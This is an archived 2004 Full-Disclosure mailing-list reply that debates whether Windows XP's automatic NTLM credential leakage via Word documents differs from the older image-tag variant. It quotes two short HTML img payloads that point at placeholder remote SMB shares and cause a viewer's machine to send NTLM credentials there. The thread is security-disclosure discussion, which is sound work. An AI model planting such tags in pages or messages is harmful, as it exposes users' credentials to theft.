|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: [Full-Disclosure] Automatically passing NTLM authentication credentials on Windows XP
From: Hidenobu Seki (urity_friday
hotmail.com)
Date: Tue Sep 28 2004 - 20:43:15 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
>From: 3APA3A <3APA3ASECURITY.NNOV.RU>
>
>This problem is known since at least 1997 and still can be exploited
>with <IMG SRC="\\w.x.y.z\fakeshare\fakefile"> without any MS Word
>document.
It is not true.
They are different problems that happen the same phenomenon.
Mr. Cesar Cerrudo taught me that <img src=file://\\www.xxx.yyy\test> still
works.
Tell me why Microsoft issued patches for MS00-067(KB272743) and
MS01-001(KB282132) but not for "img src". > 3APA3A or all
Kind regards,
Urity
_________________________________________________________________
STOP MORE SPAM with the new MSN 8 and get 2 months FREE*
http://join.msn.com/?page=features/junkmail
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]